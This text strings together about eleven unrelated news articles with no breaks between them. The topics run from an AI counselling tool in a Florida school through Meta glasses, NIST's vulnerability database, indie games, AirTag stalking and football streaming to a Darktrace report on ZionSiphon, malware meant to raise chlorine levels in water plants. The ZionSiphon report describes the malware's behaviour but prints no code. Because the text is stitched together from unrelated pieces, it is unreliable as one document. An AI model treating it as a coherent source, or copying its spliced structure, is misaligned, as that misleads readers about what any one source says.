Brittani Phillips checked her phone. A middle school counselor in Putnam County, Florida, Phillips receives messages from an artificial intelligence-enabled therapy platform that students use during nonschool hours. It flags when a student may be at risk for harming themself or others based on what the student types into a chat.
Phillips saw that this was a “severe” alert for an eighth grader.
So, Phillips spent her evening on the phone with the student’s mom, probing her to figure out what was going on and how vulnerable the student was. Phillips also called the police, she says, noting that she tells students that the chats are confidential until they can’t be.
That was last school year, in the spring.
Advertisement
“He’s alive and well. He’s in ninth grade this year,” Phillips says. She believes that the interaction built trust between her and the family. When the student passes her in the hall now, he makes a point to greet her, she adds.
Navigating budget shortfalls and limited mental health staff, Interlachen Jr.-Sr. High School, where Phillips works, is using an AI platform to vet students’ mental health needs.
Phillips’ district has used Alongside, an automated student monitoring system, for three years. It’s an example of the growing category of tools that are marketed to K-12 schools for similar purposes, with at least 9 companies getting funding deals since 2022.
Alongside says its tool is used by more than 200 schools around the US and argues that its platform offers better services than typical telehealth options because it has a social and emotional skill-building chat tool — where students yak about their life-problems with a llama called Kiwi that tries to teach them to build up resilience — and its AI-generated content is monitored by clinicians. The system offers resource-tapped schools, especially in rural areas, access to critical mental health resources, company representatives say.
Many experts and families also worry that students attach to AI too strongly. Even as a recent national survey found that 20 percent of high schoolers have used AI romantically or know someone who has, there’s significant interest in keeping students from emotionally connecting with bots. That even includes a proposed federal law that would force AI companies to remind students that chatbots aren’t real people.
Still, in her job, Phillips says the tool her school uses is exceptional at putting out the “small fires.” With around 360 middle schoolers to support, having this tool to hand-hold them through the breakups and other routine problems they face allows her to focus her time with students nearing crisis. Plus, students sometimes find it easier to turn to AI for dealing with emotional problems, she says.
On the Digital Couch
Student nervousness plays into why they are comfortable confiding in these technologies, school counselors say.
Advertisement
Speaking with a mental health professional can be intimidating, especially for adolescents, says Sarah Caliboso-Soto, a licensed clinical social worker who serves as the assistant director of clinical programs at the USC Suzanne Dworak-Peck School of Social Work and the clinical director for the Trauma Recovery Center and Telebehavioral Health at USC.
There’s a generational component as well. For students who’ve grown up encountering chat interfaces through social media and websites, AI interfaces can feel familiar. And kids today find that it’s easier to text than call someone on the phone, says Linda Charmaraman, director of the Youth, Media & Wellbeing Research Lab at Wellesley Centers for Women.
Using AI to work through emotions also allows students to avoid watching facial expressions, which they may worry will carry judgment, she adds. Also, chatbots are available at times when a human might not be, without the hassle of having to make an appointment, Charmaraman says.
“It’s almost more natural than interacting with another human being,” Caliboso-Soto says.
Advertisement
In her work with a telehealth clinic, Caliboso-Soto has seen a rise in crisis text lines and chat lines. The clinic doesn’t use AI of any kind, she says, but it often gets approached by companies looking to get AI into the therapy sessions as notetakers.
It’s not necessarily bad in Caliboso-Soto’s opinion. For resource-strapped schools, AI can be used “as a first line of defense,” regularly checking in with students and pointing them in the right direction when they need more help, she says.
The starting price for a school to use Alongside’s services is about $10 per student per year, according to the company. Larger districts usually receive volume-based discounts.
But Caliboso-Soto worries about using AI as a substitute counselor. It lacks the discernment that clinicians provide when interacting with students, she notes. While large language models can be trained to notice symptoms in text, they cannot see or hear what a human clinician can when interacting with a student, the inflections of the voice and the movements of the body, nor can it reliably catch subtle observations or behaviors. “You can’t replace human connection, human judgment,” she adds.
Advertisement
While AI can speed up the diagnostic process or free up time for school counselors, it’s crucial not to overly rely on it for mental health, says Charmaraman. The technology can miss some of the nuances that a human counselor would catch, and it can give students unrealistic positive reinforcement. Schools need to adopt a holistic approach that includes families and caregivers, she argues.
Plus, if a school is increasingly using AI intervention to filter serious cases, it’s worth paying attention to whether students are having less frequent contact with clinically-trained humans, Caliboso-Soto says.
For its part, Alongside representatives say that the platform is not meant as a replacement for human therapy. The app is a stepping stone to seeking help from adults, says Ava Shropshire, a junior at Washington University who serves as a youth adviser for Alongside. She argues that the app makes mental health and social-emotional learning feel more normal for students and can lead them to seek out human help.
Still, some students think it’s at best a Band-Aid.
Advertisement
Social Accountability
“Can you think of another time in history when people have been so lonely, when our communities have been so weak?” asks Sam Hiner, executive director of The Young People’s Alliance, a North Carolina-based organization that lobbies for more youth participation in politics and policymaking.
During a time of economic upheaval, technology and social media have manipulated and isolated students from one another, and that’s led to a deep yearning for community and belonging, Hiner says.
Students will get it wherever they can, even if that’s through ChatGPT, he adds.
The Young People’s Alliance released a framework for regulating AI that allows for some therapeutic uses of the technology.
Advertisement
But in general, the organization is striving to rebuild the human community and is set against use of AI when it threatens to replace human companionship, Hiner says. “That’s a critical aspect of therapy and of living a fulfilled life and having social connection and having mental well-being,” he adds.
So for Hiner, the main concern is what’s called a “parasocial relationship,” when students develop a one-sided emotional attachment, especially when the technology enters schools for therapeutic purposes. It might be valuable to have an AI that can provide feedback or conduct analysis, even to mental health, but Hiner says that the AI should not hint or convey that it has its own emotional state — for instance, saying “I’m proud of you” to a student user — because that encourages attachment.
Even though platforms often claim to decrease loneliness, they don’t really measure whether people are more connected and are more set up to live fulfilled, connected, happy lives in the long term, says Hiner: “All [tech platforms are] measuring is whether this bot is serving as an effective crutch for the immediate feelings of loneliness that they’re experiencing.”
What advocates want to prevent is these bots fueling the loss of social skills because they pull people away from relationships with other people, where they have social accountability, Hiner says.
Advertisement
Pushing Boundaries
Privacy experts note that these chatbots do not generally carry the same privacy protections of conversations with a licensed therapist. And when concerns about student privacy and encounters with the police are high, use of these tools raise “messy” privacy concerns, even when supervised by people with clinical training, a privacy law expert says.
Both the company and Phillips, the counselor in Putnam County, stress that, to work, these systems need human oversight. Phillips feels like this tool is an improvement over other monitoring tools the district has used, which point students toward in-school discipline rather than mental health help.
This school year, Phillips noted 19 “severe” alerts from the AI health tool as of February (from a total of 393 active users). The company doesn’t separate the incidents by which students caused them. So some of the same students are causing multiple of those 19 “severe alerts,” Phillips notes.
Phillips has learned, in using the tool, that it takes a human to perceive teenage humor, too.
Advertisement
That’s because some alerts aren’t genuine. On occasion, middle school students — usually boys — will test the boundaries of this technology, Phillips says. They type “my uncle touches me” or “my mom beat me with a pole” into the chat to test whether Phillips will follow up on it.
These boys are just trying to see if anyone is listening, to test whether anyone cares, she says. Sometimes, they just find it funny.
When she pulls them aside to discuss it, she can observe their body language, and whether it changes, which might suggest that the comment was real. If it was a joke, they often become apologetic. When a student doesn’t seem remorseful, Phillips will call and let the parents know what happened. But even in these cases, Phillips feels she has more options than provided by other monitoring systems, which would refer the student to in-school suspension.
Because Phillips is keeping her eye on the interactions, the students also learn to trust that she’s actually monitoring the system, she adds.
Advertisement
And, she says, the number of boys who do test the system in that way goes down every year.
Every time I’ve written about Meta’s AI-enabled glasses, I invariably get asked these questions: Why do you even want these? Why do you want smart glasses that can play music or misidentify native flora in a weirdly cheery voice? I am a lifelong Ray-Ban Wayfarer wearer, and I’m also WIRED’s resident Meta wearer. I grab a pair of Meta glasses whenever I leave the house because I like being able to use one device instead of two or three on a walk. With Meta glasses, I can wear sunglasses andworkout headphones in one!
Meta sold more than 7 million pairs in 2025. Take a look at any major outdoor or sporting event, and you’ll see more than a few people wearing these to record snippets for Instagram or TikTok. Meta’s partnership with EssilorLuxottica has made smart glasses accessible, stylish, and useful and is undoubtedly the reason why Google, and now Apple, are trying to horn in on the market. After the notable flop that is the Apple Vision Pro, Apple is recalibrating its face-wearable strategy, moving away from augmented reality (AR) toward simpler, display-less, and hopefully good-looking glasses.
That’s not to say that you shouldn’t be careful how you use these glasses. Meta doesn’t have the greatest track record on privacy, and the company has continued to push forward with policies that are questionable at best. Even if you’re not concerned that face recognition will allow Meta to target immigrants or enable stalkers to find their victims, at the very least, people really do not like the idea that you could start recording them at any moment.
Probably the biggest hurdle to wearing Meta glasses is that even doing so seems like a gross violation of the social contract. After all, these are Mark Zuckerberg’s “pervert glasses.” When I pop these on my head, I’ve had friends (and my spouse) recoil and say, “I have apps to warn me away from people like you.” The best part, though, is that Oakley and Ray-Ban already make really great sunglasses. Even if the battery runs out or you don’t use Meta AI at all, these are stellar at shading your eyes from the sun.
Last year, Meta upgraded the original Meta Ray-Ban Wayfarers that became a smash hit. These are Meta’s entry-level glasses, and they come in a variety of lens styles. You can order them with clear lenses, prescription lenses, transition lenses, or the OG sunglass lenses, as well as in a variety of fits, including standard, large, or high-bridge frames. Improvements to this generation include an upgrade to a 12-MP camera and up to eight hours of battery life; writer Boone Ashworth’s testing clocked in at five to six hours.
If you put a bunch of computers in charge of your house, it’s generally desirable to ensure their up-time is as close to 100% as possible. An uninterruptible power supply can help in this regard. To that end, that’s why [Bill Collis] whipped one up for his Home Assistant setup.
[Bill]’s UPS is charged with one job—keeping the Home Assistant Green hub and an Xfinity XB7 cable modem online when the grid goes dark. The construction is relatively straightforward. When the grid is up, everything is powered via a Mean Well AC-DC 12 V power supply, while the power is also used to charge a 12.8 V 10 Ah lithium iron phosphate battery pack. When the grid goes out, the system switches over to running the attached hardware on pure battery power. A Victron BatteryProtect is used to automatically disconnect the load if the battery voltage drops too low. Meanwhile, a Shelly Plus Uni module is used to monitor battery voltage and system status, integrated right into Home Assistant itself.
If you want to keep the basics of your smart home going at all times, something like this is a pretty simple way to go. We’ve featured some other great UPS builds in the past, too. If you’re whipping up your own hardware to keep your home or lab alive in the dark of night, don’t hesitate to notify the tipsline.
The National Institute of Standards and Technology will stop assigning severity scores to lower-priority vulnerabilities due to the growing workload from rising submission volumes.
Starting April 15, the service will only analyze and provide additional details (e.g., severity rating, product lists) for security issues that meet specific criteria related to the risk they pose.
The National Vulnerability Database (NVD) will still list all submitted vulnerabilities, but those considered low priority will have a severity rating only from the CVE Numbering Authority (CNA) that evaluated and submitted it.
In an announcement this week, the non-regulatory federal agency said it will only provide additional details for vulnerabilities that meet one of the following criteria:
are in CISA’s Known Exploited Vulnerabilities (KEV) catalog
affect the U.S. federal government software
involve critical software as per Executive Order 14028
NIST explained that the decision was driven by the large number of submissions, which grew by 263% recently and continued to accelerate in 2026. The organization enriched 42,000 CVEs in 2025, but it can no longer keep up with the increasing volume.
NIST NVD is a public, centralized database of known software and hardware vulnerabilities, which also provides additional descriptions and analyses on top of the unique identifiers (CVE IDs) assigned by CNAs, such as vendors and the not-for-profit The MITRE Corporation.
Advertisement
The point of enriching vulnerability details is to make CVE entries usable for risk management, including assigning severity scores, identifying affected product versions, classifying weaknesses, and providing links to advisories, patches, or related research.
NIST NVD is used universally by security researchers, software vendors, government agencies, IT professionals, journalists, and regular users seeking more information about a specific security issue.
“All submitted CVEs will still be added to the NVD. However, those that do not meet the criteria above will be categorized as “Not Scheduled,” explains NIST.
“This will allow us to focus on CVEs with the greatest potential for widespread impact. While CVEs that do not meet these criteria may have a significant impact on affected systems, they generally do not present the same level of systemic risk as those in the prioritized categories.”
Advertisement
NIST admits that the new rules allow some potentially high-impact CVE slip through. For this reason, the agency accepts enrichment requests for “any lowest priority CVEs” via email messages at ‘nvd@nist.gov.’
The lack of enrichment or notable delays was noticeable since 2024, but the organization has now formally declared that it will focus on the most important entries.
AI chained four zero-days into one exploit that bypassed both renderer and OS sandboxes. A wave of new exploits is coming.
At the Autonomous Validation Summit (May 12 & 14), see how autonomous, context-rich validation finds what’s exploitable, proves controls hold, and closes the remediation loop.
Rim-driven thrusters turn the normal propeller-motor arrangement inside out; rather than mounting the motor at the center of the propeller, they use a large hollow motor, with the blades attached to the inside of the rotor. They’re mostly used in ship propellers, though there have been some suggestions to use them in electric aircraft. [Integza], always looking for new and unusual ways to create propulsion, took this idea and made it into a jet engine.
Rather than using an electric motor, the fan in this design is propelled by miniature rocket nozzles along the edge. The fan levitates on a layer of high-pressure gas between the fan rim and the housing. To prevent too much pressurized gas from escaping, the fan and housing needed to fit together closely, but with minimal friction. A prototype made out of acrylic and resin and powered by compressed air proved that the idea worked, but [Integza] wanted to make to this a combustion-powered engine.
The full engine would be similar to a rocket engine, with the fan being the nozzle. The combustion chamber was built out of a brass fitting, and it burned propane in compressed air. The fan and housing were CNC-milled out of aluminium and brass, respectively. They worked well when powered with compressed air, but seized up when connected to the combustion chamber — the fan was thermally expanding and jamming in the housing. Progressively rounding down the edges of the fan failed to solve this, and a hole melted in the fan during one test. [Integza] machined a new fan, which he anodized to increase its heat resistance.
To keep it from overheating, he sprayed water into the combustion chamber, creating steam and cooling the exhaust stream to a manageable temperature. The engine did work, though we do wonder whether the fan actually increases its thrust over that of the base rocket engine.
Panic, the company behind the tiny and excellent Playdate console, is taking a stand on generative AI. The company has published an AI disclosure that says as of this month, the Playdate Catalog “will no longer accept titles that use ‘Generative AI’ for art, audio, music, text, or dialog.” Panic does allow for developers to use AI assistance for coding, but also says that “we will flag any title as such and specify the extent that it was used (for example, “Lua debugging”) so the customer can decide whether to support it or not.”
This comes a day after Panic announced that Playdate season three was happening and would arrive later this year. For those who don’t recall, the Playdate includes a “season” worth of games when you buy it, 24 titles in total with two revealed every week. Season two came out last year with 12 games — but, as Game Developer notes, one of those games used generative AI for writing and coding. On Bluesky, someone asked Panic if it would disclose what games in season three used AI, and the company confirmed that it was a requirement for season three that developers not use AI for art, music, writing or coding.
Specifically, Panic says you can’t use large language models like ChatGPT or Google Gemini, AI image generators like Stable Diffusion or audio generators like MuseNet and Suno. Previously-approved games with generative AI will be allowed to stay on the catalog with a disclosure that indicates what exactly AI was used for. The company says these guidelines are “under constant discussion and is subject to change at any time.”
I recall seeing AI disclosures on games in the Playdate Catalog in the past, but it makes sense to be up-front and clear on exactly what Panic allows and what it will reject. That said, it’s fairly easy to sideload games onto a Playdate, so anyone who wants to use generative AI to make a game isn’t entirely out of luck — though distribution and discovery for Playdate owners will obviously be harder.
Welcome to our latest roundup of what’s going on in the indie game space. Once again, there are some neat new games for you to check out this weekend. We’ve got a bunch of updates and announcements for upcoming titles to tell you about too.
There have been a bunch of solid indie showcases lately (and highlights from another one to tell you about below). If you want to learn about a ton of other games ASAP, you might want to set your alarm pretty early on April 25.
Starting at 5AM ET that day, the latest edition of Indie Life Expo takes place on YouTube, Twitch, TikTok, Bilibili and elsewhere. This one will feature more than 200 games! A rapid-fire Indie Waves segment will power through 160 of them. Organizers received 1,100 submissions for this installment, so hats off to them for featuring a sizable percentage of those.
Before that, you can check out another showcase on April 21. Top Hat Studios Presents: Spring Showcase 2026 will start at noon ET on the publisher’s YouTube and Twitch channels.
Advertisement
The stream will feature Motorslice, Well Dweller and survival horror game Becrowned, as well premieres and other Top Hat games. I’ve been looking forward to Motorslice, which has a May release window. I wager we’ll get a precise release date for that during this stream.
Meanwhile, there’s an interesting Steam event taking place soon. InterfaceX26 will run from April 27 until May 4. This one is focused on games that deal with made-up operating systems and other custom interfaces. Organizers have brought together more than 150 developers and publishers, who are asking Valve to introduce an official “Fake OS” tag for games on Steam.
Some neat games will be included in a sale and a showcase on May 2, including Blippo+, TR-49 and The Roottrees are Dead. Expect demos and relevant new releases too. Speaking of which…
New releases
We’ve been waiting a very long time for Replaced. This cyberpunk adventure from Sad Cat Studios and publisher Thunderful finally landed this week on Steam, GOG, Xbox on PC and Xbox Series X/S. It’s on Game Pass Ultimate and PC Game Pass. Otherwise, the base game costs $20. A supporter edition that includes the soundtrack is $25. It’ll hit the Epic Games Store at a later date.
Advertisement
The game was initially supposed to arrive in 2022. It certainly didn’t help that Sad Cat Studios was forced to relocate from Belarus to Cyprus after Russia’s invasion of Ukraine. But the game is finally here and it debuted to generally positive reviews.
Replaced is a 2.5D action platformer set in an alternate version of 1980s America, in which you play as an AI trapped in a human body that may or may not dream of electric sheep. I haven’t yet had a chance to properly jump into this gorgeous-looking game, but I’m hoping to do so this weekend.
Speaking of games I’ve long had on my wishlist, Gecko Gods arrived this week. I think I first clapped eyes on this around 2022. Various trailers charmed me with the idea of a puzzle exploration platformer that casts you in the role of a gecko that’s able to run along walls and ceilings.
I’ve played around 90 minutes of this one so far. I dig the look and the gecko is very cute (being able to customize its appearance is a nice touch). I love that you “collect” different types of bugs by eating them. It’s a fairly relaxing game, which is broadly what I need at the minute.
Advertisement
I think there are some issues here, though. I’ve explored two of the main five islands in the open world and it feels a bit sparse so far. The joy of being able to clamber up and around any object complicates things when it comes to more precise platforming sections. While the sailing sections are pretty, the boat is clunky to control on the choppy water. I ran into some mild technical issues as well on PS5 with occasional framerate dips and objects popping in. Hopefully, that’s something the developers at Inresin are able to address.
Gecko Gods — from publishers Super Rare Originals and Gamersky Games — is available now on Steam, PS5 and Nintendo Switch. It’s normally $20, but there’s a 10 percent launch discount until April 30 (on PS5, this only applies to PlayStation Plus members)
Another highly anticipated game landed this week in the form of Mouse: PI for Hire. We’ve had our eyes on this first-person shooter/detective game with sumptuous rubberhose-style animation for quite some time. Reviews have been generally positive so far, and it seems that there’s enough substance here to live up to those stellar visuals.
Thirsty Suitors developer Outerloop Games and co-publisher Outersloth served up the cooking-themed Dosa Divas this week. It tells the story of two sisters who set out on a journey with their mech to take down a fast food empire and reconnect communities through cooking.
It caught my eye when I saw it during a showcase a while back and it has a great concept, though I don’t exactly love turn-based combat. I’ve read a few lukewarmreviews of the game, and the consensus seems to be that the cooking mechanics and combat perhaps needed some more time to simmer.
If you’d like to try Dosa Divas yourself, you can pick it up on Steam, Xbox Series X/S, PS5, Nintendo Switch and Switch 2. It’ll usually run you $20, but there’s a 10 percent launch discount until April 28.
If you’re looking for a puzzle game that can be relaxing or rather dark, depending on your mood, it might be worth checking out A Storied Life: Tabitha. As you pack up the home of a late loved one, you’ll need to decide which items to keep in the limited storage space you have and discard the rest. You’ll need to wrap fragile items in bubble wrap and vacuum pack soft items to save room in the boxes.
Advertisement
As you save items, you’ll unlock words that you can use to fill in the blanks of your loved one’s life and tell their story, Mad Libs-style. Given that you’ll find items like a blackmail letter and a shirt with lipstick on the collar, it seems like there’s a lot of variety to the kinds of stories you can tell.
A Storied Life: Tabitha is available on Steam now. It’ll normally run you $15, but you can save 10 percent if you buy it before April 28.
To round out this section, I’ll quickly note that Hades 2 is out now on PS5 and Xbox Series X/S for $30, with a 20 percent launch discount. It’s on Game Pass Ultimate, Game Pass Premium and PC Game Pass too.
I bought Hades 2 when Supergiant Games brought it to Steam early access two years ago, telling myself I’d wait until the full game was out. But I still haven’t gotten around to it yet. There are always too many games tugging at my fragile attention span and Hades 2 faded into the background for me. I really ought to play it, I know!
Advertisement
Upcoming
I’m keeping an eye out for Agefield High: Rock the School from Refugium Games. This spiritual successor to Rockstar’s Bully is set to arrive this summer on Steam. It emerged this week that it will hit PS5 and Xbox Series X/S later in the year.
It’s a coming-of-age adventure in which you play as Sam, a young lad who has moved to a new school in the early 2000s. He wants to make his last few months of high school a time to remember.
There’s a branching narrative with multiple endings here — you can opt to go to classes and be a good student, or skip school and cause trouble. As a mostly rule-abiding student way back when, I’d be tempted to go for the latter. This seems like a bit of a life sim with a broad array of activities and ways to get into bother. I’m looking forward to it.
The latest edition of the Galaxies Showcase — yet another indie spotlight event — took place this week and The Backworld caught my attention. This is a Mother-inspired RPG from Numor Games and publisher Top Hat with charming art direction (yes, I did see that one character doing a Naruto run), an intriguing mix of characters and…
Advertisement
Oh no, why did the music stop? Why did it get so dark all of a sudden? What are these horrifying beasts that are chasing my character? Yup, there’s a heavy horror element here. Numor took inspiration from The Backrooms as well.
The Backworld will be released later this year. A demo just hit Steam.
A Study in Blue, from Relate Games, was another highlight of the Galaxies Showcase, thanks in large part to that impressive animation. This is a point-and-click adventure in which you play as two characters with complex pasts: private detective Kenneth and runaway Blue.
You’ll explore a semi-open world and solve crimes by collecting clues and calling out characters’ lies. There are three intertwined story acts and multiple endings. A Steam demo featuring a side quest from the main game that’ll take around two hours to complete is available now.
Advertisement
I’m always going to be interested in any game that riffs on The Legend of Zelda: A Link to the Past. On the face of this trailer, Elementallis developer AnKae Games seems to borrow quite a bit of the design language and other ideas from the SNES classic. Still, if you’re going to crib from anything, it may as well be the best game of all time.
This 2D action RPG, which is also published by Top Hat and has a heavier focus on elemental powers than A Link to the Past, looks very much like my kind of jam. It’s coming to Steam, GOG, Switch, PS4, PS5, Xbox Series X/S and Xbox One on April 28. Per the eShop listing, it’ll cost $18.
The biggest benefit of Apple’s AirTags is that they help you find your belongings, whether you’re looking for lost keys or keeping track of your luggage while traveling. But AirTags can also be used to track you without your knowledge.
AirTags work by combining built-in sensors, wireless signals and Apple’s wide Find My network to let you keep tabs on your valuables. If you ever lose your wallet with an AirTag inside, for example, you can use the Find My app to locate it on a map, have it play a sound to help you find it nearby, or mark it as “lost,” which allows other Find My users to help you find it.
One of the biggest complaints about AirTags, however, is that someone with malicious intent could easily slip one of the tiny tags into your bag and then track your movements without your consent. Multiple people have reported AirTag-related stalking incidents where the victims didn’t know the trackers were placed on them until much later.
Advertisement
Apple and Google (Android users have their own choice of Bluetooth trackers, such as the Moto Tag, which works with Google’s Find Hub) have since collaborated on an industry standard that alerts the user if a device is being used to track them without their knowledge. Thanks to this collaboration, Android users will be able to know if an AirTag is being used to track them, too.
Apple, for its part, has also made some changes in the past few years that improve the ability to detect an unwanted AirTag. In the initial rollout, an AirTag would make a sound three days after it’s separated from its paired device. Now, that duration is 8 to 24 hours. If you have unwanted tracking notifications enabled (which we’ll get to below), you’ll receive an audible alert.
We should note here that the new AirTag is 50% louder than the first-generation model, and would therefore be theoretically better at alerting you to the unwanted AirTag. Apple has also said that the speaker on the second-gen AirTag is harder to remove than on the first-gen model, in case bad actors try to remove it.
Advertisement
Apple’s Find My helps you set up and track an AirTag. It can also help notify you if an unwanted tracker is detected.
Patrick Holland/CNET
Detecting unwanted trackers
To be able to detect unwanted trackers, first enable unwanted-tracking notifications. For AirTags or other Find My accessories, these pop-up notifications (e.g., “AirTag found moving with you”) are available on devices with iOS 14.5 or later. For other Bluetooth tracking devices, these notifications are enabled on iOS 17.5 or later.
You should enable Location Services, Find My iPhone, Bluetooth and Allow Notifications. Here’s how:
Head to Settings, then Privacy & Security, then Location Services and toggle it on.
After that, head to Settings, then Apple Account, select Find My and turn Find My iPhone on.
To enable Bluetooth, go to Settings, then Bluetooth and turn that on.
Then go to Settings, then Notifications, scroll down to Tracking Notifications and toggle on Allow Notifications. Make sure airplane mode is off, or you won’t receive tracking notifications.
Watch this: Testing the New AirTag, While Tim Cook’s White House Visit Sparks Apple Boycott Calls
What to do when you get the tracking notification
If you do get a notification like “Unknown tracker alert” or “Item detected near you,” you can try to find the unwanted AirTag by tapping it. Tap continue and then tap Play Sound or tap Find Nearby to locate the AirTag in question.
Advertisement
If it doesn’t play a sound or you’re unable to find it, the item may no longer be on your person. Apple suggests checking your other belongings or the area around you, just in case. If you want to review the notification at a later time, you can open the Find My app, tap Items and then tap Items Detected With You.
Be aware that there are often “false positives,” when notifications are triggered when someone nearby has a tracker on them. If you’re traveling on a train, plane or bus, waiting in line or seated in a public space, a mistaken tracking alert could stem from glitches or high-density Bluetooth environments.
If you get an alert, though, it’s always a good idea to take it seriously and investigate what might be causing it.
If you do find an AirTag that doesn’t belong to you, hold the top of your iPhone near the tracker until you see a notification. Tap it, and this will launch a website that provides information like its serial number, the last four digits of the phone number or a blurred-out email address of its owner. If the AirTag is marked as “lost,” you may see a message with instructions on how to contact them.
Advertisement
If you’re concerned that the tracker is being used to monitor your movements and location, Apple advises taking a screenshot of the information above for your records. You can then disable the AirTag by pressing down on the back of the AirTag, turning it counterclockwise to remove the cover and removing the battery.
Of course, before making any of these changes, it’s important to come up with a safety plan, especially if you’re afraid you’re being tracked by a current or former abusive partner. Contact your local law enforcement if you feel like your safety is at risk, or the National Domestic Violence Hotline 800-799-SAFE (7233).
Can English Premier League leader Arsenal hold its nerve, or will second-place Man City take the chance to close the gap on the Gunners in this crucial title race showdown at the Etihad?
A home victory for the hosts on Sunday looks essential if Man City is to claim a sixth EPL title under manager Pep Guardiola. A win here would move City to within three points of Arsenal. The hosts can draw plenty of encouragement from the comfortable 2-0 win in last month’s League Cup final as they look to heap further pressure on the Gunners. That pressure may be starting to get to the league leaders.
While Arsenal’s 2-1 home defeat last Sunday against Bournemouth has given City renewed optimism that it can catch its title opponents, Mikel Arteta’s team nevertheless claimed a positive result in midweek. Arsenal’s goalless draw at the Emirates against Sporting Lisbon ensured its passage into the UEFA Champions League semifinals for the second season in a row.
Man City takes on Arsenal on Sunday, April 19, at the Etihad Stadium, with kickoff set for 4:30 p.m. BST. That makes it an 11:30 a.m. ET or 8:30 a.m. PT start in the US and Canada, and a 1:30 a.m. AEST kickoff in Australia in the early hours of Monday morning.
Advertisement
Midfield star Declan Rice is set to start for Arsenal on Sunday. He recovered from an illness to star in the Gunners’ midweek 0-0 draw with Sporting Lisbon in the Champions League.
Catherine Ivill/AMA/Getty Images
How to watch Man City vs. Arsenal in the US without cable
Sunday’s crucial clash will be broadcast on NBC and streaming service Peacock. To catch the game live on Peacock, you’ll need a Peacock Premium or Premium Plus subscription.
Advertisement
Peacock offers two Premium plans, and after recent price increases, the ad-supported Premium plan costs $11 a month and the ad-free Premium Plus plan costs $17 a month.
How to watch the Premier League 2025-26 with a VPN
If you’re traveling abroad and want to keep up with Premier League action while away from home, a VPN can help enhance your privacy and security when streaming.
Advertisement
It encrypts your traffic and prevents your internet service provider from throttling your speeds, and can also be helpful when connecting to public Wi-Fi networks while traveling, adding an extra layer of protection for your devices and logins. VPNs are legal in many countries, including the US and Canada, and can be used for legitimate purposes such as improving online privacy and security.
However, some streaming services may have policies that restrict VPN use to access region-specific content. If you’re considering a VPN for streaming, check the platform’s terms of service to ensure compliance.
If you choose to use a VPN, follow the provider’s installation instructions to ensure you’re connected securely and in compliance with applicable laws and service agreements. Some streaming platforms may block access when a VPN is detected, so verify whether your streaming subscription allows VPN use.
Price $78 for two yearsLatest Tests No DNS leaks detected, 18% speed loss in 2025 testsJurisdiction British Virgin IslandsNetwork 3,000 plus servers in 105 countries
ExpressVPN is our current best VPN pick for people who want a reliable and safe VPN, and it works on a variety of devices. It’s normally $120 a year for its most popular plan (Advanced), but if you sign up for an annual subscription for $90, you’ll get three months free. That’s the equivalent of $6 a month.
Advertisement
Note that ExpressVPN offers a 30-day money-back guarantee.
73% off with 2yr plan (+4 free months). Now only $3.49/month
Livestream Man City vs. Arsenal in the UK
This Sunday afternoon clash is exclusive to Sky Sports and will be shown on its Sky Sports Main Event channel. If you already have Sky Sports as part of your TV package, you can stream the game via its Sky Go app. Cord-cutters will want to set up a Now account and a Now Sports membership to stream the game.
Advertisement
Now TV
Sky’s standalone streaming service Now offers access to Sky Sports channels with a Now Sports membership. You can get a day of access for £15 or sign up to a monthly plan from £35 a month right now.
Livestream Man City vs. Arsenal in Canada
If you want to livestream EPL games in Canada this season, you’ll need to subscribe to Fubo. The service has secured exclusive rights to the Premier League and is broadcasting all 380 matches live.
Advertisement
Fubo
Fubo is the go-to destination for Canadians looking to watch the EPL, with exclusive streaming rights to every match. It currently costs CA$27 for the first month, then CA$31.50 per month from then on.
Livestream Man City vs. Arsenal in Australia
Livestreaming rights for the EPL are now with Stan Sport, which is showing all 380 matches live, including this game.
Advertisement
Stan
Stan Sport will set you back AU$20 a month (on top of a Stan subscription, which starts at AU$12). It’s also worth noting that the streaming service is currently offering a seven-day free trial.
A subscription will also give you access to Premier League, Champions League and Europa League action, as well as international rugby and Formula E.
The investment will fund growth across auditing and engineering, with expansion expected across Ireland and the UK.
Dublin-based start-up Audrey AI has announced the closure of a $1.8m pre-seed funding round, which was led by Sure Valley Ventures and Delta Partners. There was additional participation from Enterprise Ireland, former CEO of Calypso Donnchadh Casey, former CBO of Wayflyer Conor Jones, alongside former Big 4 auditors.
Established in 2025 by Ryan Loughran and David Burke, who met on the Founders programme at Dogpatch Labs, Audrey AI develops AI solutions for financial auditors. The AI-powered platform aims to automate the most time-consuming parts of financial audit engagements.
The organisation has stated that the newly secured funds will be put towards the expansion of Audrey AI’s specialist audit and engineering teams, as the company expands its reach across Ireland, the UK and “beyond”.
Advertisement
Commenting on the announcement, Loughran, who is also the company’s CEO, said: “Developers have Copilot, lawyers have Harvey, but auditors still primarily work in Excel. We’re building AI that understands auditing deeply enough to raise the bar on quality, not just speed, freeing auditors to focus on the judgement and oversight that matters most.”
A number of Irish organisations operating within the artificial intelligence space have already announced major investments in April. Start-up Otel AI, which is building an AI platform for hotel managers, recently announced a raise of €2m, bringing the company’s total funding to date to €2.8m.
E-commerce technology company Zellor raised €850,000 in its very first external funding round. The start-up, which is led by CEO Niall O’Sullivan, received backing from Enterprise Ireland and a number of strategic Irish investors.
Galway-based AI security software start-up Octostar, which also has offices in Italy and the UK, raised €6.1m in an extended seed funding round.
Advertisement
Updated, 1.05pm, 16 April 2026: This article was amended to clarify Audrey AI’s expansion plans.
Don’t miss out on the knowledge you need to succeed. Sign up for the Daily Brief, Silicon Republic’s digest of need-to-know sci-tech news.
A new malware called ZionSiphon, specifically designed for operational technology, is targeting water treatment and desalination environments to sabotage their operations.
The threat can adjust hydraulic pressures and raise chlorine levels to dangerous levels, researchers found during their analysis.
Based on its IP targeting and political messages embedded in its strings, ZionSiphon appears to focus on targets based in Israel.
Researchers at AI-powered cybersecurity company Darktrace found a flawed encryption logic error in the malware’s validation mechanism that makes it non-functional but warn that future ZionSiphon releases could fix the flaw to unleash its power in attacks.
Upon deployment, the malware checks whether the host IP falls within Israeli ranges and whether the system contains water/OT-related software or files, to ensure it is running in water treatment or desalination systems.
Advertisement
Strings from the targets list Source: Darktrace
Darktrace notes that the logic for country verification is broken due to an XOR mismatch, causing the targeting to fail and triggering the self-destruct mechanism instead of executing the payload.
If ZionSiphon were to activate, it could cause significant damage by increasing chlorine levels and maximizing the flaw and pressure.
It does this via a function named “IncreaseChlorineLevel(),” which appends a text block on existing configuration files to maximize the chlorine dose and flow as much as it is physically supported by the plant’s mechanical systems.
“IncreaseChlorineLevel()” checks a hardcoded list of configuration files associated with desalination, reverse osmosis, chlorine control, and water treatment OT/Industrial Control Systems (ICS),” Darktrace says.
“As soon as it finds any one of these files present, it appends a fixed block of text to it and returns immediately.”
Advertisement
